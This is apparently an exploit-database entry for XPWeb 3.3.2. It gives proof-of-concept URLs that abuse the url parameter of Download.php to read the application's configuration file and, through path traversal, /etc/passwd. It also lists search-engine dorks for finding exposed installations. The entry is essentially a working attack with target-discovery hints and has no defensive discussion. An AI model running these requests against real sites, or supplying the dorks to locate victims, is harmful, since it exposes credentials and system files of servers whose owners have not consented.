id: 2656
date: 02/17/2008
title: XPWeb 3.3.2 (Download.php url) Remote File Disclosure Vulnerability
author: GoLd_M
cves: 

===================================================================
XPWeb 3.3.2 (Download.php url) Remote File Disclosure Vulnerability
===================================================================



### XPWeb 3.3.2 (Download.php url) Remote File Disclosure Vulnerability
### http://puzzle.dl.sourceforge.net/sourceforge/xpweb/XPWeb_v3.3.2.tgz
### POC :
###    /XPWeb_v3.3.2/Download.php?url=Config.inc.php
###    /XPWeb_v3.3.2/Download.php?url=../../../../../../../etc/passwd
### Dorks : intitle:XPWeb 3.3.2
###        intitle:XPWeb 3.0.1




#  0day.today [2023-03-22]  #